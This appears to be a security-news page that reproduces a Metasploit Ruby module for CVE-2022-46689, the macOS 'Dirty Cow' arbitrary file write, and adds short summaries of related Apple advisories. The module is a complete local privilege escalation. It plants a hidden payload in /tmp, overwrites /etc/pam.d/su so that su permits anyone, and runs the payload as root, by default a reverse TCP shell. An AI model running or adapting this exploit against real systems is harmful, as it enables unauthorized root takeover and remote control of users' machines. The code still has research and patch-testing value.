Headline
macOS Dirty Cow Arbitrary File Write Local Privilege Escalation
Dirty Cow arbitrary file write local privilege escalation exploit for macOS.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::File include Msf::Post::OSX::Priv include Msf::Post::OSX::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'macOS Dirty Cow Arbitrary File Write Local Privilege Escalation', 'Description' => %q{ An app may be able to execute arbitrary code with kernel privileges }, 'License' => MSF_LICENSE, 'Author' => [ 'Ian Beer', # discovery 'Zhuowei Zhang', # proof of concept 'timwr' # metasploit integration ], 'References' => [ ['CVE', '2022-46689'], ['URL', 'https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c'], ['URL', 'https://github.com/zhuowei/MacDirtyCowDemo'], ], 'Platform' => 'osx', 'Arch' => ARCH_X64, 'SessionTypes' => ['shell', 'meterpreter'], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' }, 'Targets' => [ [ 'Mac OS X x64 (Native Payload)', {} ], ], 'DisclosureDate' => '2022-12-17', 'Notes' => { 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES], 'Reliability' => [REPEATABLE_SESSION], 'Stability' => [CRASH_SAFE] } ) ) register_advanced_options [ OptString.new('TargetFile', [ true, 'The pam.d file to overwrite', '/etc/pam.d/su' ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def check version = Rex::Version.new(get_system_version) if version > Rex::Version.new('13.0.1') CheckCode::Safe elsif version < Rex::Version.new('13.0') && version > Rex::Version.new('12.6.1') CheckCode::Safe elsif version < Rex::Version.new('10.15') CheckCode::Safe else CheckCode::Appears end end def exploit if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end unless writable? datastore['WritableDir'] fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" end payload_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}" binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) upload_and_chmodx payload_file, binary_payload register_file_for_cleanup payload_file target_file = datastore['TargetFile'] current_content = read_file(target_file) backup_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}" unless write_file(backup_file, current_content) fail_with Failure::BadConfig, "#{backup_file} is not writable" end register_file_for_cleanup backup_file replace_content = current_content.sub('rootok', 'permit') replace_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}" unless write_file(replace_file, replace_content) fail_with Failure::BadConfig, "#{replace_file} is not writable" end register_file_for_cleanup replace_file exploit_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}" exploit_exe = exploit_data 'CVE-2022-46689', 'exploit' upload_and_chmodx exploit_file, exploit_exe register_file_for_cleanup exploit_file exploit_cmd = "#{exploit_file} #{target_file} #{replace_file}" print_status("Executing exploit '#{exploit_cmd}'") result = cmd_exec(exploit_cmd) print_status("Exploit result:\n#{result}") su_cmd = "echo '#{payload_file} & disown' | su" print_status("Running cmd:\n#{su_cmd}") result = cmd_exec(su_cmd) unless result.blank? print_status("Command output:\n#{result}") end exploit_cmd = "#{exploit_file} #{target_file} #{backup_file}" print_status("Executing exploit (restoring) '#{exploit_cmd}'") result = cmd_exec(exploit_cmd) print_status("Exploit result:\n#{result}") endend
Related news
Apple Security Advisory 2022-12-13-8 - watchOS 9.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.
Apple Security Advisory 2022-12-13-7 - tvOS 16.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.
Apple Security Advisory 2022-12-13-6 - macOS Big Sur 11.7.2 addresses bypass, code execution, and integer overflow vulnerabilities.
Apple Security Advisory 2022-12-13-5 - macOS Monterey 12.6.2 addresses bypass, code execution, and integer overflow vulnerabilities.
Apple Security Advisory 2022-12-13-4 - macOS Ventura 13.1 addresses bypass, code execution, out of bounds access, out of bounds write, spoofing, and use-after-free vulnerabilities.
Apple Security Advisory 2022-12-13-2 - iOS 15.7.2 and iPadOS 15.7.2 addresses bypass, code execution, integer overflow, out of bounds write, and spoofing vulnerabilities.
Apple Security Advisory 2022-12-13-1 - iOS 16.2 and iPadOS 16.2 addresses bypass, code execution, out of bounds write, spoofing, and use-after-free vulnerabilities.
The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2. An app may be able to disclose kernel memory.
A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.
The issue was addressed with improved bounds checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2. Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges.